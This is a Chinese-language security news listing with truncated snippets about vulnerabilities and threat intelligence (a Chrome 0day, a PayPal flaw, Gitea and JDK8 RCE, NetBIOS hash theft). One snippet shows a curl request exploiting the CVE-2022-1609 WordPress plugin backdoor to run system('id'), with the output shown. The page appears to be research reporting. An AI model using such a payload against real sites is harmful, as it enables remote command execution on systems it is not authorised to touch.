Chrome 尚未修复的0day?!
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及...
每周高级威胁情报解读(2022.05.19~05.26)
2022.05.19~05.26 攻击团伙情报Sandworm 使用新版 ArguePatch 攻击乌克兰目标Turla组织新的间谍活动瞄准东欧目标Wizard Spider团伙开发的加密器分析攻击行动...
CVE-2022-1609 WordPress Weblizar后门
$ curl -s -d 'blowfish=1' -d 'blowf=system('id');' 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www...
每日安全动态推送(05-27)
Tencent Security Xuanwu Lab Daily News• NetUSB exploitation part 1: Setting up the environment:https://blog.security.sea.com/posts/netusb-emul...
针对GPS追踪器设备的安全研究(part2)
针对GPS追踪器设备的安全研究(part1) 0x01 背景描述在上一篇中,我发布了对在GPS跟踪设备网络中发现的漏洞的深入分析。自从我向制造商深圳i365披露我的发现...
PayPal 0 day漏洞可窃取用户资金
研究人员在PayPal中发现一个未修复的安全漏洞,攻击者利用该漏洞可窃取用户资金。安全研究人员h4x0r_dz在PayPal转账服务'www.paypal[.]com/agreements/approv...
JDK8从任意文件写到远程命令执行
01 前 言在对某产品进行挖掘时,发现了一个任意文件写的漏洞口,项目是以jar包的形式来运行的,在这种场景下除了能够覆盖掉服务器上的文件之外,似乎无...
利用NetBIOS欺骗攻击盗取hash
前言 链路本地多播名称解析(LLMNR)是一个基于域名系统(DNS)数据包格式的协议,IPv4和IPv6的主机可以通过此协议对同一本地链路上的主机执行名称解析。在DN...
MANDIANT 网络威胁情报分析人员核心能力框架
2012 年的卡内基梅隆大学、2015 年的情报与国家安全联盟(INSA)都试图提出有关网络威胁情报(CTI)分析人员的能力框架。以此规范网络威胁情报分析人员所需要...
CVE-2022-30781:一条普通的 Git 命令导致的 Gitea RCE
今年年初的时候,我挖掘到了一枚 Gogs 中因为未对用户可控的目录路径进行检测,从而导致后续路径拼接可以导致目录穿越的漏洞(CVE-2022-0415)。 攻击者能上...